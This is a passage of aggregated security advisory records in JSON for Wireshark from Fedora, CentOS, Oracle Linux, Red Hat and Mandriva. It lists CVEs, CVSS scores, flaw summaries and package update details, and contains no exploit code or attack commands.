systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "cvss3": {}, "published": "2011-02-02T19:29:59", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: wireshark-1.2.14-1.fc13", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2011-0444", "CVE-2011-0445"], "modified": "2011-02-02T19:29:59", "id": "FEDORA:B6CC8110BFF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QW3PKY6YV2DU7UXON325A7SY2LJNNGBA/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "cvss3": {}, "published": "2010-09-02T20:45:30", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: wireshark-1.2.10-1.fc13", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2995"], "modified": "2010-09-02T20:45:30", "id": "FEDORA:C0E72110A4E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/6ISTV7Z6IY7QFNYIIIQETVRSIB4LXMVO/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "cvss3": {}, "published": "2011-04-26T16:01:49", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: wireshark-1.4.6-1.fc15", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591"], "modified": "2011-04-26T16:01:49", "id": "FEDORA:3CD7F110688", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JLJLDHY6WJURI5S3GKTMQUMAODIDQXAA/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "cvss3": {}, "published": "2011-04-26T21:51:38", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: wireshark-1.4.6-1.fc14", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1590", "CVE-2011-1591"], "modified": "2011-04-26T21:51:38", "id": "FEDORA:BFBC310F877", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/F2EQTQBYPC3L7BL3UN72466YMA5RTU2A/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "cvss3": {}, "published": "2010-09-02T20:47:13", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: wireshark-1.2.10-1.fc12", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2995"], "modified": "2010-09-02T20:47:13", "id": "FEDORA:22127110B4B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/S7HT3OF5LY4L6YTBUNYNRCQVKUA5ZFHV/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "cvss3": {}, "published": "2011-06-15T05:45:17", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: wireshark-1.2.17-1.fc13", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175"], "modified": "2011-06-15T05:45:17", "id": "FEDORA:A487811127C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/DH7SM423CBN7HHI7QFNVCHYJPE2B45YD/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "cvss3": {}, "published": "2011-03-11T20:56:24", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: wireshark-1.2.15-1.fc13", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-3445", "CVE-2011-0538", "CVE-2011-0713", "CVE-2011-1138", "CVE-2011-1139", "CVE-2011-1140", "CVE-2011-1141", "CVE-2011-1143"], "modified": "2011-03-11T20:56:24", "id": "FEDORA:C7FE910F926", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4CUFPCJPSKBZP2KVOQZ5CMO5WZW6EGHW/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2022-02-27T11:58:08", "description": "**CentOS Errata and Security Advisory** CESA-2010:0625\n\n\nWireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nMultiple buffer overflow flaws were found in the Wireshark SigComp\nUniversal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read\na malformed packet off a network or opened a malicious dump file, it could\ncrash or, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284,\nCVE-2010-2286)\n\nUsers of Wireshark should upgrade to these updated packages, which contain\nWireshark version 1.0.15, and resolve these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2010-August/053851.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-August/053852.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-August/053875.html\nhttps://lists.centos.org/pipermail/centos-announce/2010-August/053876.html\n\n**Affected packages:**\nwireshark\nwireshark-gnome\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2010:0625", "cvss3": {}, "published": "2010-08-23T15:13:08", "type": "centos", "title": "wireshark security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2995"], "modified": "2010-08-27T15:14:48", "id": "CESA-2010:0625", "href": "https://lists.centos.org/pipermail/centos-announce/2010-August/053851.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-27T11:55:43", "description": "**CentOS Errata and Security Advisory** CESA-2012:0509\n\n\nWireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed packet\noff a network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2011-1590,\nCVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958,\nCVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698,\nCVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running instances of\nWireshark must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2012-April/055510.html\n\n**Affected packages:**\nwireshark\nwireshark-devel\nwireshark-gnome\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2012:0509", "cvss3": {}, "published": "2012-04-24T14:27:48", "type": "centos", "title": "wireshark security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1143", "CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-4102", "CVE-2012-0041", "CVE-2012-0042", "CVE-2012-0066", "CVE-2012-0067", "CVE-2012-1595"], "modified": "2012-04-24T14:27:48", "id": "CESA-2012:0509", "href": "https://lists.centos.org/pipermail/centos-announce/2012-April/055510.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:33", "description": "[1.0.15-1.0.1.el5_5.1]\n- Add oracle-ocfs2-network.patch\n[1.0.15-1]\n- upgrade to 1.0.15\n- http://www.wireshark.org/docs/relnotes/wireshark-1.0.15.html\n- fixes CVE-2010-2287 CVE-2010-2284\n- Related: #612239\n[1.0.14-1.2]\n- fix corner case in CVE-2010-2284\n- Related: #612239\n[1.0.14-1]\n- upgrade to 1.0.14\n- http://www.wireshark.org/docs/relnotes/wireshark-1.0.14.html\n- fixes CVE-2010-1455 CVE-2010-2283 CVE-2010-2284 CVE-2010-2286 CVE-2010-2287\n- Resolves: #612239 ", "cvss3": {}, "published": "2010-08-11T00:00:00", "type": "oraclelinux", "title": "wireshark security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2010-2284", "CVE-2010-2287", "CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286"], "modified": "2010-08-11T00:00:00", "id": "ELSA-2010-0625", "href": "http://linux.oracle.com/errata/ELSA-2010-0625.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:47", "description": "[1.2.15-2.0.1.el6_2.1]\n- Add oracle-ocfs2-network.patch to allow disassembly of OCFS2 interconnect\n[1.2.15-2.1]\n- security patches\n- Resolves: CVE-2011-1143\n CVE-2011-1590\n CVE-2011-1957\n CVE-2011-1959\n CVE-2011-2174\n CVE-2011-2175 CVE-2011-1958\n CVE-2011-2597 CVE-2011-2698\n CVE-2011-4102\n CVE-2012-0041 CVE-2012-0066 CVE-2012-0067\n CVE-2012-0042\n CVE-2012-1595", "cvss3": {}, "published": "2012-04-23T00:00:00", "type": "oraclelinux", "title": "wireshark security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2011-2174", "CVE-2012-0066", "CVE-2011-2175", "CVE-2011-4102", "CVE-2011-1590", "CVE-2011-1959", "CVE-2011-2597", "CVE-2012-1595", "CVE-2011-2698", "CVE-2012-0042", "CVE-2012-0041", "CVE-2012-0067", "CVE-2011-1957", "CVE-2011-1143", "CVE-2011-1958"], "modified": "2012-04-23T00:00:00", "id": "ELSA-2012-0509", "href": "http://linux.oracle.com/errata/ELSA-2012-0509.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:14", "description": "[1.8.10-4.0.1.el6]\r\n- Add oracle-ocfs2-network.patch to allow disassembly of OCFS2 interconnect\r\n \n[1.8.10-4]\r\n- fix memory leak when reassemblying a packet\r\n- Related: #711024\r\n \n[1.8.10-3]\r\n- fix config.h conflict\r\n- Related: #711024\r\n \n[1.8.10-2]\r\n- do not configure with setcap-install\r\n- Related: #711024\r\n \n[1.8.10-1]\r\n- upgrade to 1.8.10\r\n- see http://www.wireshark.org/docs/relnotes/wireshark-1.8.10.html\r\n- Related: #711024\r\n \n[1.8.8-10]\r\n- fix consolehelper path for dumpcap\r\n- Related: #711024\r\n \n[1.8.8-9]\r\n- fix dumpcap group\r\n- Related: #711024\r\n \n[1.8.8-8]\r\n- fix tshark output streams and formatting for -L, -D\r\n- Resolves: #1004636\r\n \n[1.8.8-7]\r\n- fix double free in wiretap/netmon.c\r\n- Related: #711024\r\n \n[1.8.8-6]\r\n- security patches\r\n- Resolves: CVE-2013-4927\r\n CVE-2013-4931\r\n CVE-2013-4932\r\n CVE-2013-4933\r\n CVE-2013-4934\r\n CVE-2013-4935\r\n CVE-2013-3557\r\n \n[1.8.8-5]\r\n- fix desktop file\r\n- Related: #711024\r\n \n[1.8.8-4]\r\n- fix tap-iostat buffer overflow\r\n- fix dcom string overrun\r\n- fix sctp bytes graph crash\r\n- fix airpcap dialog crash\r\n- Related: #711024\r\n \n[1.8.8-3]\r\n- fix dumpcap privileges to 755\r\n- Related: #711024\r\n \n[1.8.8-2]\r\n- new sources\r\n- Related: #711024\r\n \n[1.8.8-1]\r\n- upgrade to 1.8.8\r\n- see http://www.wireshark.org/docs/relnotes/wireshark-1.8.8.html\r\n- Resolves: #711024\r\n- Resolves: #858976\r\n- Resolves: #699636\r\n- Resolves: #750712\r\n- Resolves: #832021\r\n- Resolves: #889346\r\n- Resolves: #659661\r\n- Resolves: #715560\r\n \n[1.2.15-3]\r\n- security patches\r\n- Resolves: CVE-2011-1143\r\n CVE-2011-1590\r\n CVE-2011-1957\r\n CVE-2011-1959\r\n CVE-2011-2174\r\n CVE-2011-2175 CVE-2011-1958\r\n CVE-2011-2597 CVE-2011-2698\r\n CVE-2011-4102\r\n CVE-2012-0041 CVE-2012-0066 CVE-2012-0067\r\n CVE-2012-0042\r\n CVE-2012-1595", "cvss3": {}, "published": "2013-11-25T00:00:00", "type": "oraclelinux", "title": "wireshark security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-5598", "CVE-2013-3561", "CVE-2011-2174", "CVE-2012-0066", "CVE-2013-4931", "CVE-2012-5595", "CVE-2011-2175", "CVE-2011-4102", "CVE-2011-1590", "CVE-2013-4933", "CVE-2012-4288", "CVE-2011-1959", "CVE-2011-2597", "CVE-2012-1595", "CVE-2011-2698", "CVE-2012-4292", "CVE-2013-4927", "CVE-2012-5599", "CVE-2013-3559", "CVE-2012-6060", "CVE-2013-4932", "CVE-2012-4289", "CVE-2012-4291", "CVE-2012-2392", "CVE-2012-6056", "CVE-2012-0042", "CVE-2012-0041", "CVE-2012-0067", "CVE-2011-1957", "CVE-2012-4290", "CVE-2011-1143", "CVE-2012-5600", "CVE-2013-4083", "CVE-2012-6061", "CVE-2012-4285", "CVE-2013-4936", "CVE-2012-6062", "CVE-2013-4935", "CVE-2013-4081", "CVE-2013-3557", "CVE-2012-6059", "CVE-2011-1958", "CVE-2013-4934", "CVE-2012-5597", "CVE-2013-5721", "CVE-2012-3825"], "modified": "2013-11-25T00:00:00", "id": "ELSA-2013-1569", "href": "http://linux.oracle.com/errata/ELSA-2013-1569.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2021-10-21T04:43:48", "description": "Wireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nMultiple buffer overflow flaws were found in the Wireshark SigComp\nUniversal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read\na malformed packet off a network or opened a malicious dump file, it could\ncrash or, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284,\nCVE-2010-2286)\n\nUsers of Wireshark should upgrade to these updated packages, which contain\nWireshark version 1.0.15, and resolve these issues. All running instances\nof Wireshark must be restarted for the update to take effect.\n", "cvss3": {}, "published": "2010-08-11T00:00:00", "type": "redhat", "title": "(RHSA-2010:0625) Moderate: wireshark security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2995"], "modified": "2018-05-26T00:26:17", "id": "RHSA-2010:0625", "href": "https://access.redhat.com/errata/RHSA-2010:0625", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-19T18:40:05", "description": "Wireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed packet\noff a network or opened a malicious dump file, it could crash or, possibly,\nexecute arbitrary code as the user running Wireshark. (CVE-2011-1590,\nCVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could\ncrash or stop responding if it read a malformed packet off a network, or\nopened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958,\nCVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698,\nCVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running instances of\nWireshark must be restarted for the update to take effect.\n", "cvss3": {}, "published": "2012-04-23T00:00:00", "type": "redhat", "title": "(RHSA-2012:0509) Moderate: wireshark security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1143", "CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-4102", "CVE-2012-0041", "CVE-2012-0042", "CVE-2012-0066", "CVE-2012-0067", "CVE-2012-1595"], "modified": "2018-06-06T16:24:26", "id": "RHSA-2012:0509", "href": "https://access.redhat.com/errata/RHSA-2012:0509", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T19:16:54", "description": "Multiple DoS conditions, buffer overflow.", "edition": 2, "cvss3": {}, "published": "2010-09-14T00:00:00", "title": "Wireshark sniffer multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-2285", "CVE-2010-2284", "CVE-2010-2287", "CVE-2010-2283", "CVE-2010-2995", "CVE-2010-2286", "CVE-2010-2994"], "modified": "2010-09-14T00:00:00", "id": "SECURITYVULNS:VULN:10928", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10928", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:40", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2011:083\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : wireshark\r\n Date : May 12, 2011\r\n Affected: 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n This advisory updates wireshark to the latest version (1.2.16),\r\n fixing several security issues:\r\n \r\n The X.509if dissector in Wireshark 1.2.x before 1.2.16 and 1.4.x\r\n before 1.4.5 does not properly initialize certain global variables,\r\n which allows remote attackers to cause a denial of service (application\r\n crash) via a crafted .pcap file (CVE-2011-1590).\r\n \r\n Stack-based buffer overflow in the DECT dissector in\r\n epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows\r\n remote attackers to execute arbitrary code via a crafted .pcap file\r\n (CVE-2011-1591).\r\n \r\n The NFS dissector in epan/dissectors/packet-nfs.c in Wireshark 1.4.x\r\n before 1.4.5 on Windows uses an incorrect integer data type during\r\n decoding of SETCLIENTID calls, which allows remote attackers to cause\r\n a denial of service (application crash) via a crafted .pcap file\r\n (CVE-2011-1592).\r\n \r\n The updated packages have been upgraded to the latest 1.2.x version\r\n (1.2.16) which is not vulnerable to these issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1590\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1591\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1592\r\n http://www.wireshark.org/docs/relnotes/wireshark-1.2.16.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2010.0:\r\n ce52dd0e89fe2e385a659825460edca9 2010.0/i586/dumpcap-1.2.16-0.1mdv2010.0.i586.rpm\r\n 91ffe9960b24b0d66ab4c7967aea0da8 2010.0/i586/libwireshark0-1.2.16-0.1mdv2010.0.i586.rpm\r\n 7660240ac8dfdcf06090835d43a20328 2010.0/i586/libwireshark-devel-1.2.16-0.1mdv2010.0.i586.rpm\r\n 6a6a6f06b1a658bded5854b9dc5abfce 2010.0/i586/rawshark-1.2.16-0.1mdv2010.0.i586.rpm\r\n b4449efd8f0aa2bc4efa2d6c0ed567f2 2010.0/i586/tshark-1.2.16-0.1mdv2010.0.i586.rpm\r\n b33adf3885df69a642ee9790a4cb52ff 2010.0/i586/wireshark-1.2.16-0.1mdv2010.0.i586.rpm\r\n c02d4845b02d0ea52cf6f6dcba9d4db4 2010.0/i586/wireshark-tools-1.2.16-0.1mdv2010.0.i586.rpm \r\n 9267be0104600200a1ac7b8dcf6672f5 2010.0/SRPMS/wireshark-1.2.16-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 6e8d8eb2c0902544079d3ead62d58678 2010.0/x86_64/dumpcap-1.2.16-0.1mdv2010.0.x86_64.rpm\r\n 07ee55185a1dc8862aec25fed869485f 2010.0/x86_64/lib64wireshark0-1.2.16-0.1mdv2010.0.x86_64.rpm\r\n cac74e47a0f8b2e8f2a58515efb0aef7 \r\n2010.0/x86_64/lib64wireshark-devel-1.2.16-0.1mdv2010.0.x86_64.rpm\r\n 4af3e8be251fd245166c9c164e62497f 2010.0/x86_64/rawshark-1.2.16-0.1mdv2010.0.x86_64.rpm\r\n 31b5df98c2618af1659d81ee6b3589fc 2010.0/x86_64/tshark-1.2.16-0.1mdv2010.0.x86_64.rpm\r\n eea20f5ae3fe65b71dfd7379c780515c 2010.0/x86_64/wireshark-1.2.16-0.1mdv2010.0.x86_64.rpm\r\n 6c97841450b5bd1e1038b0e867a73008 \r\n2010.0/x86_64/wireshark-tools-1.2.16-0.1mdv2010.0.x86_64.rpm \r\n 9267be0104600200a1ac7b8dcf6672f5 2010.0/SRPMS/wireshark-1.2.16-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.1:\r\n 343907ede3e21d5787be8824d6edcc80 2010.1/i586/dumpcap-1.2.16-0.1mdv2010.2.i586.rpm\r\n 90c2fc8cddd4ef897a6e6e5b3ef2c066 2010.1/i586/libwireshark0-1.2.16-0.1mdv2010.2.i586.rpm\r\n 1f6fc405ab5ae97b89cbd632059b48e5 2010.1/i586/libwireshark-devel-1.2.16-0.1mdv2010.2.i586.rpm\r\n 426f850b66a0298066cda626ca1cd432 2010.1/i586/rawshark-1.2.16-0.1mdv2010.2.i586.rpm\r\n 056227eb81a5e506dcde5b95923cd341 2010.1/i586/tshark-1.2.16-0.1mdv2010.2.i586.rpm\r\n 